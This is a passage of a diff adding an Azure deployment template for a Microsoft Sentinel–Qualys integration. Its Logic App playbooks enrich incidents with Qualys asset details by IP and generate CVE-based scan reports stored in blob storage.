+ }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/qps/rest/2.0/count/am/hostasset": { + "post": { + "summary": "Asset Count By Criteria", + "description": "Get Asset Count for Given Criteria", + "operationId": "[[variables('_operationId-AssetCountByCriteria')]", + "parameters": [ + { + 
"name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + }, + { + "name": "Content-Type", + "in": "header", + "required": true, + "type": "string", + "default": "text/xml", + "description": "Content-Type", + "x-ms-summary": "Content-Type", + "x-ms-visibility": "internal" + }, + { + "name": "Accept", + "in": "header", + "required": true, + "type": "string", + "default": "application/json", + "description": "Accept", + "x-ms-summary": "Accept", + "x-ms-visibility": "internal" + }, + { + "name": "filter-xml", + "in": "body", + "schema": { + "type": "string", + "description": "Filter Criteria XML", + "title": "filter-criteria", + "default": " >\" operator=\"EQUALS\">Search Value \t\t \t\t \t\t \t\t \t\t ", + "x-ms-visibility": "advanced" + }, + "required": true + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Vary\"": { + "description": "\"Vary\"", + "type": "string" + }, + "\"evaluation\"": { + "description": "\"evaluation\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-Xss-protection\"": { + "description": "\"X-Xss-protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + 
"description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + } + }, + "securityDefinitions": { + "basic_auth": { + "type": "basic" + } + }, + "security": [ + { + "basic_auth": "[variables('TemplateEmptyArray')]" + } + ], + "tags": "[variables('TemplateEmptyArray')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[[concat(variables('workspace-name'),'/Microsoft.SecurityInsights/',concat('LogicAppsCustomConnector-', last(split(variables('playbookId1'),'/'))))]", + "properties": { + "parentId": "[[variables('playbookId1')]", + "contentId": "[variables('_playbookContentId1')]", + "kind": "LogicAppsCustomConnector", + "version": "[variables('playbookVersion1')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId1')]", + "contentKind": "LogicAppsCustomConnector", + "displayName": "QualysCustomConnector", + "contentProductId": "[variables('_playbookcontentProductId1')]", + "id": "[variables('_playbookcontentProductId1')]", + "version": "[variables('playbookVersion1')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": 
"[variables('playbookTemplateSpecName2')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM-GetAssetDetails Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion2')]", + "parameters": { + "PlaybookName": { + "defaultValue": "QualysVM-GetAssetDetails", + "type": "string" + }, + "CustomConnectorName": { + "defaultValue": "QualysCustomConnector", + "type": "string", + "metadata": { + "description": "Name of the logic app connector which performs Qualys actions." + } + } + }, + "variables": { + "QualyscustomconnectorConnectionName": "[[concat('Qualyscustomconnector-', parameters('PlaybookName'))]", + "MicrosoftSentinelConnectionName": "[[concat('MicrosoftSentinel-', parameters('PlaybookName'))]", + "connection-2": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]", + "_connection-2": "[[variables('connection-2')]", + "connection-3": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "_connection-3": "[[variables('connection-3')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "properties": { + "provisioningState": "Succeeded", + "state": "Enabled", + "definition": { + "$schema": 
"https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "$connections": { + "type": "Object" + } + }, + "triggers": { + "Microsoft_Sentinel_incident": { + "type": "ApiConnectionWebhook", + "inputs": { + "body": { + "callback_url": "@{listCallbackUrl()}" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "path": "/incident-creation" + } + } + }, + "actions": { + "Add_comment_to_incident_(V3)": { + "runAfter": { + "Compose_Incident_Comment": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "incidentArmId": "@triggerBody()?['object']?['id']", + "message": "

@{variables('IncidentComment')}

" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/Incidents/Comment" + } + }, + "Compose_Incident_Comment": { + "runAfter": { + "Create_Output_HTML_table": [ + "Succeeded" + ] + }, + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "@body('Create_Output_HTML_table')" + } + }, + "Create_Output_HTML_table": { + "runAfter": { + "For_each_IP_Address_get_asset_details": [ + "Succeeded" + ] + }, + "type": "Table", + "inputs": { + "format": "HTML", + "from": "@variables('OutputArray')" + } + }, + "Entities_-_Get_IPs": { + "type": "ApiConnection", + "inputs": { + "body": "@triggerBody()?['object']?['properties']?['relatedEntities']", + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/entities/ip" + } + }, + "For_each_IP_Address_get_asset_details": { + "foreach": "@body('Entities_-_Get_IPs')?['IPs']", + "actions": { + "Condition": { + "actions": { + "Append_to_Output_Array": { + "runAfter": { + "Compose_Output": [ + "Succeeded" + ] + }, + "type": "AppendToArrayVariable", + "inputs": { + "name": "OutputArray", + "value": "@outputs('Compose_Output')" + } + }, + "Compose_Output": { + "type": "Compose", + "inputs": { + "DNS": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['DNS']?['#cdata-section']", + "Domain": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['DNS_DATA']?['DOMAIN']?['#cdata-section']", + "FQDN": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['DNS_DATA']?['FQDN']?['#cdata-section']", + "Hostname": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['DNS_DATA']?['HOSTNAME']?['#cdata-section']", + "IP Address": 
"@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['IP']", + "LastScannedDateTime": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['LAST_VULN_SCAN_DATETIME']", + "NetBIOS": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['NETBIOS']?['#cdata-section']", + "OS": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['OS']?['#cdata-section']", + "QualysAssetID": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['ID']" + } + } + }, + "runAfter": { + "Parse_Asset_Details_JSON": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Add_comment_if_no_details_found": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "No details found for host: @{items('For_each_IP_Address_get_asset_details')?['Address']} \n" + } + } + } + }, + "expression": { + "and": [ + { + "not": { + "equals": [ + "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']", + null + ] + } + } + ] + }, + "type": "If" + }, + "Get_Asset_Details_By_IP": { + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/asset/host/", + "queries": { + "action": "list", + "details": "All", + "ips": "@items('For_each_IP_Address_get_asset_details')?['Address']" + } + } + }, + "Parse_Asset_Details_JSON": { + "runAfter": { + "Get_Asset_Details_By_IP": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Asset_Details_By_IP')))", + "schema": { + "properties": { + "HOST_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "HOST_LIST": { + "properties": { 
+ "HOST": { + "properties": { + "DNS": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "DNS_DATA": { + "properties": { + "DOMAIN": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "FQDN": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "HOSTNAME": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "ID": { + "type": "string" + }, + "IP": { + "type": "string" + }, + "LAST_VM_AUTH_SCANNED_DATE": { + "type": "string" + }, + "LAST_VM_AUTH_SCANNED_DURATION": { + "type": "string" + }, + "LAST_VM_SCANNED_DATE": { + "type": "string" + }, + "LAST_VM_SCANNED_DURATION": { + "type": "string" + }, + "LAST_VULN_SCAN_DATETIME": { + "type": "string" + }, + "NETBIOS": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "OS": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TRACKING_METHOD": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "Initialize_variable_-_OutputArray": [ + "Succeeded" + ] + }, + "type": "Foreach", + "runtimeConfiguration": { + "concurrency": { + "repetitions": 1 + } + } + }, + "Initialize_variable_-_IncidentComment": { + "runAfter": { + "Entities_-_Get_IPs": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IncidentComment", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_OutputArray": { + "runAfter": { + "Initialize_variable_-_IncidentComment": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "OutputArray", + "type": "array" + } + ] + } + } + } + }, + "parameters": { + "$connections": { + 
"value": { + "QualysCustomConnector": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "connectionName": "[[variables('QualyscustomconnectorConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]" + }, + "azuresentinel": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]", + "connectionName": "[[variables('MicrosoftSentinelConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "connectionProperties": { + "authentication": { + "type": "ManagedServiceIdentity" + } + } + } + } + } + } + }, + "name": "[[parameters('PlaybookName')]", + "type": "Microsoft.Logic/workflows", + "location": "[[variables('workspace-location-inline')]", + "identity": { + "type": "SystemAssigned" + }, + "tags": { + "hidden-SentinelTemplateName": "QualysVM-GetAssetDetails", + "hidden-SentinelTemplateVersion": "1.0", + "hidden-SentinelWorkspaceId": "[[variables('workspaceResourceId')]" + }, + "apiVersion": "2017-07-01", + "dependsOn": [ + "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]" + ] + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('QualyscustomconnectorConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('QualyscustomconnectorConnectionName')]", + "api": { + "id": "[[variables('_connection-2')]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": 
"[[variables('MicrosoftSentinelConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('MicrosoftSentinelConnectionName')]", + "parameterValueType": "Alternative", + "api": { + "id": "[[variables('_connection-3')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Playbook-', last(split(variables('playbookId2'),'/'))))]", + "properties": { + "parentId": "[variables('playbookId2')]", + "contentId": "[variables('_playbookContentId2')]", + "kind": "Playbook", + "version": "[variables('playbookVersion2')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "criteria": [ + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + } + ] + } + } + } + ], + "metadata": { + "title": "QualysVM-GetAssetDetails", + "description": "When a new sentinel incident is created, this playbook gets triggered and performs the following actions: \n 1. Get IP Addresses from incident. \n 2. Get Asset Details for all IP Addresses. \n 3. Add asset details as a comment to the incident.", + "prerequisites": [ + "1. Prior to the deployment of this playbook, Qualys Logic App Custom Connector needs to be deployed under the same subscription.", + "2. Refer to [Qualys Logic App Custom Connector](../QualysCustomConnector/readme.md) documentation for deployment instructions." 
+ ], + "postDeployment": [ + "None" + ], + "lastUpdateTime": "2022-09-15T22:25:52Z", + "entities": [ + "IP" + ], + "tags": [ + "Qualys", + "Enrichment", + "VM Report" + ], + "releaseNotes": { + "version": "1.0", + "title": "[variables('blanks')]", + "notes": [ + "Initial version" + ] + } + } + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId2')]", + "contentKind": "Playbook", + "displayName": "QualysVM-GetAssetDetails", + "contentProductId": "[variables('_playbookcontentProductId2')]", + "id": "[variables('_playbookcontentProductId2')]", + "version": "[variables('playbookVersion2')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName3')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM-GetAssets-ByCVEID Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion3')]", + "parameters": { + "PlaybookName": { + "defaultValue": "QualysVM-GetAssets-ByCVEID", + "type": "string", + "metadata": { + "description": "Name of the logic app resource to be created." + } + }, + "CustomConnectorName": { + "defaultValue": "QualysCustomConnector", + "type": "string", + "metadata": { + "description": "Name of the logic app connector which performs Qualys actions." 
+ } + }, + "StorageAccountName": { + "defaultValue": "", + "type": "string", + "metadata": { + "description": "Name of the storage account to store Qualys reports." + } + } + }, + "variables": { + "QualyscustomconnectorConnectionName": "[[concat('Qualyscustomconnector-', parameters('PlaybookName'))]", + "AzureBlobStorageName": "[[parameters('StorageAccountName')]", + "AzureblobConnectionName": "[[concat('Azureblob-', parameters('PlaybookName'))]", + "MicrosoftSentinelConnectionName": "[[concat('MicrosoftSentinel-', parameters('PlaybookName'))]", + "StorageAccountId": "[[resourceId('Microsoft.Storage/storageAccounts', variables('AzureBlobStorageName'))]", + "connection-2": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]", + "_connection-2": "[[variables('connection-2')]", + "connection-3": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azureblob')]", + "_connection-3": "[[variables('connection-3')]", + "connection-4": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "_connection-4": "[[variables('connection-4')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "properties": { + "provisioningState": "Succeeded", + "state": "Enabled", + "definition": { + "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "$connections": { + "type": "Object" + } + }, + "triggers": { + 
"Microsoft_Sentinel_incident": { + "type": "ApiConnectionWebhook", + "inputs": { + "body": { + "callback_url": "@{listCallbackUrl()}" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "path": "/incident-creation" + } + } + }, + "actions": { + "Add_comment_to_incident_(V3)": { + "runAfter": { + "Create_SAS_URI_by_path_(V2)": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "incidentArmId": "@triggerBody()?['object']?['id']", + "message": "

Following Qualys VM Scan Report Generated: @{body('Create_SAS_URI_by_path_(V2)')?['WebUrl']}

" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/Incidents/Comment" + } + }, + "Create_Dynamic_Search_List_of_CVEs": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_CVEIDs": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/qid/search_list/dynamic/", + "queries": { + "action": "create", + "cve_ids": "@{join(variables('CVEID'), ',')}", + "title": "@{concat('SentinelSearchList_', utcNow())}" + } + } + }, + "Create_SAS_URI_by_path_(V2)": { + "runAfter": { + "Create_blob_(V2)": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "Permissions": "Read" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azureblob']['connectionId']" + } + }, + "method": "post", + "path": "/v2/datasets/@{encodeURIComponent('AccountNameFromSettings')}/CreateSharedLinkByPath", + "queries": { + "path": "@body('Create_blob_(V2)')?['Path']" + } + } + }, + "Create_Scan_Report_Template": { + "runAfter": { + "Parse_Create_Dynamic_Search_List_Output_JSON": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "\n\n \n <INFO key=\"title\">\n <![CDATA[@{concat('SentinelScanReportTemplate_', utcNow())}]]>\n </INFO>\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\t\t\n \n \n\t\t\n \n \n\t\t\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\t\t\n \n \n \n \n \n \n \n \n \n \n 
\n\t\t\n \n \n \n", + "headers": { + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/template/scan/", + "queries": { + "action": "create", + "report_format": "xml" + } + } + }, + "Create_blob_(V2)": { + "runAfter": { + "Download_Report": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "@body('Download_Report')", + "headers": { + "ReadFileMetadataFromServer": true + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azureblob']['connectionId']" + } + }, + "method": "post", + "path": "/v2/datasets/@{encodeURIComponent(encodeURIComponent('AccountNameFromSettings'))}/files", + "queries": { + "folderPath": "/report-blob", + "name": "@{concat('ScanReport_', utcNow())}", + "queryParametersSingleEncoded": true + } + }, + "runtimeConfiguration": { + "contentTransfer": { + "transferMode": "Chunked" + } + } + }, + "Delay_1_Minute_": { + "runAfter": { + "Set_variable_-_ReportID": [ + "Succeeded" + ] + }, + "type": "Wait", + "inputs": { + "interval": { + "count": 1, + "unit": "Minute" + } + } + }, + "Delete_Dynamic_Search_List": { + "runAfter": { + "Add_comment_to_incident_(V3)": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/qid/search_list/dynamic/", + "queries": { + "action": "delete", + "id": "@body('Parse_Create_Dynamic_Search_List_Output_JSON')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Delete_Scan_Report_Template": { + "runAfter": { + "Delete_Dynamic_Search_List": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "Content-Type": 
"text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/template/scan/", + "queries": { + "action": "delete", + "template_id": "@body('Parse_Create_Report_Template_Output_JSON')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Download_Report": { + "runAfter": { + "Wait_Until_Report_Generation_is_Finished": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "fetch", + "id": "@variables('ReportID')" + } + } + }, + "For_each_Alert_in_Incident_get_all_CVEIDs": { + "foreach": "@triggerBody()?['object']?['properties']?['Alerts']", + "actions": { + "For_each_CVEID": { + "foreach": "@body('Parse_Cutom_Details_Section')?['CVEID']", + "actions": { + "Append_to_array_CVEID": { + "type": "AppendToArrayVariable", + "inputs": { + "name": "CVEID", + "value": "@items('For_each_CVEID')" + } + } + }, + "runAfter": { + "Parse_Cutom_Details_Section": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Parse_Additional_Data_Section": { + "type": "ParseJson", + "inputs": { + "content": "@items('For_each_Alert_in_Incident_get_all_CVEIDs')?['properties']?['additionalData']", + "schema": { + "properties": { + "Alert generation status": { + "type": "string" + }, + "AlertMessageEnqueueTime": { + "type": "string" + }, + "Analytic Rule Ids": { + "type": "string" + }, + "Analytic Rule Name": { + "type": "string" + }, + "Correlation Id": { + "type": "string" + }, + "Custom Details": { + "type": [ + "string", + "null" + ] + }, + "Data Sources": { + "type": "string" + }, + "Event Grouping": { + "type": "string" + }, + "ProcessedBySentinel": 
{ + "type": "string" + }, + "Query": { + "type": "string" + }, + "Query End Time UTC": { + "type": "string" + }, + "Query Period": { + "type": "string" + }, + "Query Start Time UTC": { + "type": "string" + }, + "Search Query Results Overall Count": { + "type": "string" + }, + "Trigger Operator": { + "type": "string" + }, + "Trigger Threshold": { + "type": "string" + } + }, + "type": "object" + } + } + }, + "Parse_Cutom_Details_Section": { + "runAfter": { + "Parse_Additional_Data_Section": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@body('Parse_Additional_Data_Section')?['Custom Details']", + "schema": { + "properties": { + "CVEID": { + "items": { + "type": "string" + }, + "type": "array" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "Initialize_variable_-_ReportID": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Get_Report_Status": { + "runAfter": { + "Delay_1_Minute_": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "list", + "id": "@int(variables('ReportID'))" + } + } + }, + "Initialize_variable_-_CVEID": { + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "CVEID", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_ReportID": { + "runAfter": { + "Initialize_variable_-_ReportStatus": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ReportID", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_ReportStatus": { + "runAfter": { + "Initialize_variable_-_CVEID": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ReportStatus", + "type": "string" + } + ] + } + }, + "Launch_Scan_Report": { + 
"runAfter": { + "Parse_Create_Report_Template_Output_JSON": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "launch", + "output_format": "pdf", + "report_title": "@{concat('SentinelScanReport_', utcNow())}", + "report_type": "Scan", + "template_id": "@body('Parse_Create_Report_Template_Output_JSON')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Parse_Create_Dynamic_Search_List_Output_JSON": { + "runAfter": { + "Create_Dynamic_Search_List_of_CVEs": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Create_Dynamic_Search_List_of_CVEs')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Create_Report_Template_Output_JSON": { + "runAfter": { + "Create_Scan_Report_Template": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Create_Scan_Report_Template')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": 
